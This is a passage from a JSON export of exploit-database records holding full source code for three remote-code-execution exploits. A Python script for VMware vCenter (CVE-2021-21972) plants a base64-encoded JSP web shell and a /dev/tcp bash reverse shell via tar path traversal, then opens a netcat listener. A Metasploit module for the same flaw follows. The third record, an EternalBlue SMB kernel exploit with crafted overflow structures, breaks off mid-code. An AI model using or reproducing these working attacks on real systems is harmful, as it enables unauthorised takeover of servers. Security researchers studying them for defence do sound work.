IP',required=True)\nargs=myargs.parse_args()\n\ndef getprompt(x):\n\tprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n\ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"):\n fullpath=\"../\" * 7 + path\n return fullpath.replace('\\\\','/').replace('//','/')\n\ndef createbackdoor(localip):\n # shell4.jsp\n backdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\"\n backdoor = base64.b64decode(backdoor).decode('utf-8')\n f = open(\"shell4.jsp\",\"w\")\n f.write(backdoor)\n f.close()\n # reverse.sh \n # After decoding overwrite string 'CUSTOM_IP' for local IP \n shell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\"\n shell=base64.b64decode(shell).decode('utf-8')\n shell=shell.replace('CUSTOM_IP',localip)\n f=open(\"reverse.sh\",\"w\")\n f.write(shell)\n f.close()\n # Move on with the payload\n payload_file=tarfile.open('payload.tar','w')\n myroute=getpath()\n getprompt('Adding web backdoor to archive')\n payload_file.add(\"shell4.jsp\", myroute)\n myroute=getpath(\"tmp/reverse.sh\")\n getprompt('Adding bash backdoor to archive')\n payload_file.add(\"reverse.sh\", myroute)\n payload_file.close()\n # cleaning up a little bit\n os.unlink(\"reverse.sh\")\n os.unlink(\"shell4.jsp\")\n getprompt('Backdoor file just was created.')\n\ndef launchexploit(ip):\n res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)\n if res.status_code == 200 and res.text == 'SUCCESS':\n getprompt('Backdoor was uploaded successfully!')\n return True\n else:\n getprompt('Backdoor failed to be uploaded. Target denied access.')\n return False\n\ndef testshell(ip):\n getprompt('Looking for shell...')\n shell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\"\n res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)\n if res.status_code==200:\n getprompt('Shell was found!.')\n response=res.text\n if True:\n getprompt('Shell is responsive.')\n try:\n response=re.findall(\"b>(.+)</\",response)[0]\n print('$>uname -a')\n print(response)\n except:\n pass\n return True\n else:\n getprompt('Sorry. Shell was not found.')\n return False\n\ndef opendoor(url):\n time.sleep(3)\n getprompt('Executing command.')\n requests.get(url, verify=False, timeout=1800)\n\t\ndef executebackdoor(ip, localip):\n url=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\"\n t=threading.Thread(target=opendoor,args=(url,))\n t.start()\n getprompt('Setting up socket '+localip+':443')\n os.system('nc -lnvp 443')\n\nif len(sys.argv)== 1:\n myargs.print_help(sys.stderr)\n sys.exit(1)\ncreatebackdoor(args.local)\nuploaded=launchexploit(args.target)\nif uploaded:\n tested=testshell(args.target)\n if tested:\n executebackdoor(args.target, args.local)\ngetprompt(\"Execution completed!\")\n", "sourceHref": "https://0day.today/exploit/36472", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-25T15:35:44", "description": "This Metasploit module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. Furthermore, writing an SSH public key to /home/vsphere-ui/.ssh/authorized_keys works, but the user's non-existent password expires 90 days after install, rendering the technique nearly useless against production environments. You'll have the best luck targeting older versions of the Linux appliance. The Windows target should work ubiquitously.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "zdt", "title": "VMware vCenter Server File Upload / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "1337DAY-ID-35912", "href": "https://0day.today/exploit/description/35912", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n # \"Shotgun\" approach to writing JSP\n Rank = ManualRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated OVA file upload and path\n traversal in VMware vCenter Server to write a JSP payload to a\n web-accessible directory.\n\n Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.\n Note that later vulnerable versions of the Linux appliance aren't\n exploitable via the webshell technique. Furthermore, writing an SSH\n public key to /home/vsphere-ui/.ssh/authorized_keys works, but the\n user's non-existent password expires 90 days after install, rendering\n the technique nearly useless against production environments.\n\n You'll have the best luck targeting older versions of the Linux\n appliance. The Windows target should work ubiquitously.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and exploit\n 'mr_me', # Co-conspirator\n 'Viss' # Co-conspirator\n ],\n 'References' => [\n ['CVE', '2021-21972'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],\n ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],\n ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],\n ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],\n ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],\n ['URL', 'https://kb.vmware.com/s/article/2143838'],\n ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']\n ],\n 'DisclosureDate' => '2021-02-23', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'win'],\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true on Windows\n 'Targets' => [\n [\n # TODO: /home/vsphere-ui/.ssh/authorized_keys\n 'VMware vCenter Server <= 6.7 Update 1b (Linux)',\n {\n 'Platform' => 'linux'\n }\n ],\n [\n 'VMware vCenter Server <= 6.7 Update 3j (Windows)',\n {\n 'Platform' => 'win'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp',\n 'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\n 'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>\n OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me\n OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu\n ])\n end\n\n def spray_and_pray_min\n datastore['SprayAndPrayMin']\n end\n\n def spray_and_pray_max\n datastore['SprayAndPrayMax']\n end\n\n def spray_and_pray_range\n (spray_and_pray_min..spray_and_pray_max).to_a\n end\n\n def check\n # Run auxiliary/scanner/vmware/esx_fingerprint\n super\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n case res.code\n when 200\n # {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"}\n expected_keys = [\n 'States',\n 'Install Progress',\n 'Install Final Progress',\n 'Config Progress',\n 'Config Final Progress'\n ]\n\n if (expected_keys & res.get_json_document.keys) == expected_keys\n return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')\n end\n\n CheckCode::Detected('Target did not respond with expected keys.')\n when 401\n CheckCode::Safe('Unauthenticated endpoint access denied.')\n else\n CheckCode::Detected(\"Target responded with code #{res.code}.\")\n end\n end\n\n def exploit\n upload_ova\n pop_thy_shell # ;)\n end\n\n def upload_ova\n print_status(\"Uploading OVA file: #{ova_filename}\")\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n generate_ova,\n 'application/x-tar', # OVA is tar\n 'binary',\n %(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'),\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res && res.code == 200 && res.body == 'SUCCESS'\n fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')\n end\n\n register_files_for_cleanup(*jsp_paths)\n\n print_good('Successfully uploaded OVA file')\n end\n\n def pop_thy_shell\n jsp_uri =\n case target['Platform']\n when 'linux'\n normalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\")\n when 'win'\n normalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\")\n end\n\n print_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri\n )\n\n unless res && res.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')\n end\n\n print_good('Successfully requested JSP payload')\n end\n\n def generate_ova\n ova_file = StringIO.new\n\n # HACK: Spray JSP in the OVA and pray we get a shell...\n Rex::Tar::Writer.new(ova_file) do |tar|\n jsp_paths.each do |path|\n # /tmp/unicorn_ova_dir/../../<path>\n tar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) }\n end\n end\n\n ova_file.string\n end\n\n def jsp_paths\n case target['Platform']\n when 'linux'\n @jsp_paths ||= spray_and_pray_range.shuffle.map do |idx|\n \"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\"\n end\n when 'win'\n # Forward slashes work here\n [\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"]\n end\n end\n\n def ova_filename\n @ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\"\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35912", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-02-06T07:16:22", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 / 2008 R2 (x64) - EternalBlue SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-19T00:00:00", "id": "1337DAY-ID-27802", "href": "https://0day.today/exploit/description/27802", "sourceData": "#!/usr/bin/python\r\nfrom impacket import smb\r\nfrom struct import pack\r\nimport os\r\nimport sys\r\nimport socket\r\n \r\n'''\r\nEternalBlue exploit for Windows 7/2008 by sleepya\r\nThe exploit might FAIL and CRASH a target system (depended on what is overwritten)\r\n \r\nTested on:\r\n- Windows 7 SP1 x64\r\n- Windows 2008 R2 x64\r\n \r\nReference:\r\n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n \r\n \r\nBug detail:\r\n- For the bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n- You can see SrvOs2FeaListToNt(), SrvOs2FeaListSizeToNt() and SrvOs2FeaToNt() functions logic from WinNT4 source code\r\n https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/ea.c#L263\r\n- In vulnerable SrvOs2FeaListSizeToNt() function, there is a important change from WinNT4 in for loop. The psuedo code is here.\r\n if (nextFea > lastFeaStartLocation) {\r\n // this code is for shrinking FeaList->cbList because last fea is invalid.\r\n // FeaList->cbList is DWORD but it is cast to WORD.\r\n *(WORD *)FeaList = (BYTE*)fea - (BYTE*)FeaList;\r\n return size;\r\n }\r\n- Here is related struct info.\r\n#####\r\ntypedef struct _FEA { /* fea */\r\n BYTE fEA; /* flags */\r\n BYTE cbName; /* name length not including NULL */\r\n USHORT cbValue; /* value length */\r\n} FEA, *PFEA;\r\n \r\ntypedef struct _FEALIST { /* feal */\r\n DWORD cbList; /* total bytes of structure including full list */\r\n FEA list[1]; /* variable length FEA structures */\r\n} FEALIST, *PFEALIST;\r\n \r\ntypedef struct _FILE_FULL_EA_INFORMATION {\r\n ULONG NextEntryOffset;\r\n UCHAR Flags;\r\n UCHAR EaNameLength;\r\n USHORT EaValueLength;\r\n CHAR EaName[1];\r\n} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;\r\n######\r\n \r\n \r\nExploit info:\r\n- I do not reverse engineer any x86 binary so I do not know about exact offset.\r\n- The exploit use heap of HAL (address 0xffffffffffd00010 on x64) for placing fake struct and shellcode.\r\n This memory page is executable on Windows 7 and Wndows 2008.\r\n- The important part of feaList and fakeStruct is copied from NSA exploit which works on both x86 and x64.\r\n- The exploit trick is same as NSA exploit\r\n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\r\n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)\r\n- See the code and comment for exploit detail.\r\n \r\n \r\nsrvnet buffer info:\r\n- srvnet buffer contains a pointer to another struct and MDL about received buffer\r\n - Controlling MDL values results in arbitrary write\r\n - Controlling pointer to fake struct results in code execution because there is pointer to function\r\n- A srvnet buffer is created after target receiving first 4 bytes\r\n - First 4 bytes contains length of SMB message\r\n - The possible srvnet buffer size is \"..., 0x8???, 0x11000, 0x21000, ...\". srvnet.sys will select the size that big enough.\r\n- After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message\r\n- SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler()\r\n- SrvNetCommonReceiveHandler() passes SMB message to SMB handler\r\n - If a pointer in srvnet buffer is modified to fake struct, we can make SrvNetCommonReceiveHandler() call our shellcode\r\n - If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called\r\n - Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen.\r\n - Memory leak is ok to be ignored\r\n'''\r\n \r\n# wanted overflown buffer size (this exploit support only 0x10000 and 0x11000)\r\n# the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time\r\n# the size 0x11000 is used in nsa exploit. this size is more reliable.\r\nNTFEA_SIZE = 0x11000\r\n# the NTFEA_SIZE above is page size. We need to use most of last page preventing any data at the end of last page\r\n \r\nntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde\r\n \r\nntfea11000 = (pack('<BBH', 0, 0, 0) + '\\x00')*600 # with these fea, ntfea size is 0x1c20\r\nntfea11000 += pack('<BBH', 0, 0, 0xf3bd) + 'A'*0xf3be # 0x10fe8 - 0x1c20 - 0xc = 0xf3bc\r\n \r\nntfea1f000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x2494 # with these fea, ntfea size is 0x1b6f0\r\nntfea1f000 += pack('<BBH', 0, 0, 0x48ed) + 'A'*0x48ee # 0x1ffe8 - 0x1b6f0 - 0xc = 0x48ec\r\n \r\nntfea = { 0x10000 : ntfea10000, 0x11000 : ntfea11000 }\r\n \r\n'''\r\nReverse from srvnet.sys (Win7 x64)\r\n- SrvNetAllocateNonPagedBufferInternal() and SrvNetWskReceiveComplete():\r\n \r\n// for x64\r\nstruct SRVNET_BUFFER {\r\n // offset from POOLHDR: 0x10\r\n USHORT flag;\r\n char pad[2];\r\n char unknown0[12];\r\n // offset from SRVNET_POOLHDR: 0x20\r\n LIST_ENTRY list;\r\n // offset from SRVNET_POOLHDR: 0x30\r\n char *pnetBuffer;\r\n DWORD netbufSize; // size of netBuffer\r\n DWORD ioStatusInfo; // copy value of IRP.IOStatus.Information\r\n // offset from SRVNET_POOLHDR: 0x40\r\n MDL *pMdl1; // at offset 0x70\r\n DWORD nByteProcessed;\r\n DWORD pad3;\r\n // offset from SRVNET_POOLHDR: 0x50\r\n DWORD nbssSize; // size of this smb packet (from user)\r\n DWORD pad4;\r\n QWORD pSrvNetWekStruct; // want to change to fake struct address\r\n // offset from SRVNET_POOLHDR: 0x60\r\n MDL *pMdl2;\r\n QWORD unknown5;\r\n // offset from SRVNET_POOLHDR: 0x70\r\n // MDL mdl1; // for this srvnetBuffer (so its pointer is srvnetBuffer address)\r\n // MDL mdl2;\r\n // char transportHeader[0x50]; // 0x50 is TRANSPORT_HEADER_SIZE\r\n // char netBuffer[0];\r\n};\r\n \r\nstruct SRVNET_POOLHDR {\r\n DWORD size;\r\n char unknown[12];\r\n SRVNET_BUFFER hdr;\r\n};\r\n'''\r\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\r\n# Here is the important fields on x64\r\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\r\n# The value MUST point to valid (might be fake) struct.\r\n# - offset 0x70 (MDL) : MDL for describe receiving SMB request buffer\r\n# - 0x70 (VOID*) : MDL.Next should be NULL\r\n# - 0x78 (USHORT) : MDL.Size should be some value that not too small\r\n# - 0x7a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\r\n# - 0x80 (VOID*) : MDL.Process should be NULL\r\n# - 0x88 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\r\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\r\n# \r\n#\r\n# To free the corrupted srvnet buffer, shellcode MUST modify some memory value to satisfy condition.\r\n# Here is related field for freeing corrupted buffer\r\n# - offset 0x10 (USHORT): be 0xffff to make SrvNetFreeBuffer() really free the buffer (else buffer is pushed to srvnet lookaside)\r\n# a corrupted buffer MUST not be reused.\r\n# - offset 0x48 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\r\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\r\n# your shellcode as function argument\r\n# - offset 0x60 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\r\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\r\n# Here is x64 assembly code for setting nByteProcessed field\r\n# - fetch SRVNET_BUFFER address from function argument\r\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\r\n# - set nByteProcessed for trigger free after return\r\n# \\x8b\\x4a\\x2c mov ecx, [rdx+0x2c]\r\n# \\x89\\x4a\\x38 mov [rdx+0x38], ecx\r\n \r\nTARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010\r\nTARGET_HAL_HEAP_ADDR_x86 = 0xffdff000\r\n \r\nfakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2\r\nfakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2\r\nfakeSrvNetBufferNsa += '\\x00'*16\r\nfakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20)\r\nfakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0xffffffff, 0x60, 0x1004, 0) # _, x86 MDL.Next, .Size, .MdlFlags, .Process\r\nfakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64) # x86 MDL.MappedSystemVa, _, x64 pointer to fake struct\r\nfakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # x64 pmdl2\r\n# below 0x20 bytes is overwritting MDL\r\n# NSA exploit overwrite StartVa, ByteCount, ByteOffset fields but I think no need because ByteCount is always big enough\r\nfakeSrvNetBufferNsa += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\nfakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa\r\n \r\n# below is for targeting x64 only (all x86 related values are set to 0)\r\n# this is for show what fields need to be modified\r\nfakeSrvNetBufferX64 = pack('<II', 0x11000, 0)*2\r\nfakeSrvNetBufferX64 += pack('<HHIQ', 0xffff, 0, 0, 0)\r\nfakeSrvNetBufferX64 += '\\x00'*16\r\nfakeSrvNetBufferX64 += '\\x00'*16\r\nfakeSrvNetBufferX64 += '\\x00'*16 # 0x40\r\nfakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64) # _, _, pointer to fake struct\r\nfakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # pmdl2\r\nfakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\nfakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa\r\n \r\n \r\nfakeSrvNetBuffer = fakeSrvNetBufferNsa\r\n#fakeSrvNetBuffer = fakeSrvNetBufferX64\r\n \r\nfeaList = pack('<I', 0x10000) # the max value of feaList size is 0x10000 (the only value that can trigger bug)\r\nfeaList += ntfea[NTFEA_SIZE]\r\n# Note:\r\n# - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively\r\n# - x64: below fea will be copy to offset 0x11000 of overflow buffer\r\n# - x86: below fea will be copy to offset 0x10ff8 of overflow buffer\r\nfeaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer)-1) + fakeSrvNetBuffer # -1 because first '\\x00' is for name\r\n# stop copying by invalid flag (can be any value except 0 and 0x80)\r\nfeaList += pack('<BBH', 0x12, 0x34, 0x5678)\r\n \r\n \r\n# fake struct for SrvNetWskReceiveComplete() and SrvNetCommonReceiveHandler()\r\n# x64: fake struct is at ffffffff ffd00010\r\n# offset 0xa0: LIST_ENTRY must be valid address. cannot be NULL.\r\n# offset 0x08: set to 3 (DWORD) for invoking ptr to function\r\n# offset 0x1d0: KSPIN_LOCK\r\n# offset 0x1d8: array of pointer to function\r\n#\r\n# code path to get code exection after this struct is controlled\r\n# SrvNetWskReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\r\nfake_recv_struct = pack('<QII', 0, 3, 0)\r\nfake_recv_struct += '\\x00'*16\r\nfake_recv_struct += pack('<QII', 0, 3, 0)\r\nfake_recv_struct += ('\\x00'*16)*7\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0xa0, TARGET_HAL_HEAP_ADDR_x64+0xa0) # offset 0xa0 (LIST_ENTRY to itself)\r\nfake_recv_struct += '\\x00'*16\r\nfake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86+0xc0, TARGET_HAL_HEAP_ADDR_x86+0xc0, 0) # x86 LIST_ENTRY\r\nfake_recv_struct += ('\\x00'*16)*11\r\nfake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x190) # fn_ptr array on x86\r\nfake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86+0x1f0-1, 0) # x86 shellcode address\r\nfake_recv_struct += ('\\x00'*16)*3\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1e0) # offset 0x1d0: KSPINLOCK, fn_ptr array\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1f0-1) # x64 shellcode address - 1 (this value will be increment by one)\r\n \r\n \r\ndef getNTStatus(self):\r\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\r\nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\r\n \r\ndef sendEcho(conn, tid, data):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\r\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\r\n transCommand['Data'] = smb.SMBEcho_Data()\r\n \r\n transCommand['Parameters']['EchoCount'] = 1\r\n transCommand['Data']['Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good ECHO response')\r\n else:\r\n print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n \r\n \r\n# do not know why Word Count can be 12\r\n# if word count is not 12, setting ByteCount without enough data will be failed\r\nclass SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):\r\n structure = (\r\n ('MaxBuffer','<H'),\r\n ('MaxMpxCount','<H'),\r\n ('VCNumber','<H'),\r\n ('SessionKey','<L'),\r\n #('AnsiPwdLength','<H'),\r\n ('UnicodePwdLength','<H'),\r\n ('_reserved','<L=0'),\r\n ('Capabilities','<L'),\r\n )\r\n \r\ndef createSessionAllocNonPaged(target, size):\r\n # The big nonpaged pool allocation is in BlockingSessionSetupAndX() function\r\n # You can see the allocation logic (even code is not the same) in WinNT4 source code \r\n # https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071\r\n conn = smb.SMB(target, target)\r\n _, flags2 = conn.get_flags()\r\n # FLAGS2_EXTENDED_SECURITY MUST not be set\r\n flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY\r\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\r\n if size >= 0xffff:\r\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\r\n reqSize = size // 2\r\n else:\r\n flags2 |= smb.SMB.FLAGS2_UNICODE\r\n reqSize = size\r\n conn.set_flags(flags2=flags2)\r\n \r\n pkt = smb.NewSMBPacket()\r\n \r\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\r\n sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()\r\n \r\n sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size\r\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\r\n sessionSetup['Parameters']['VCNumber'] = 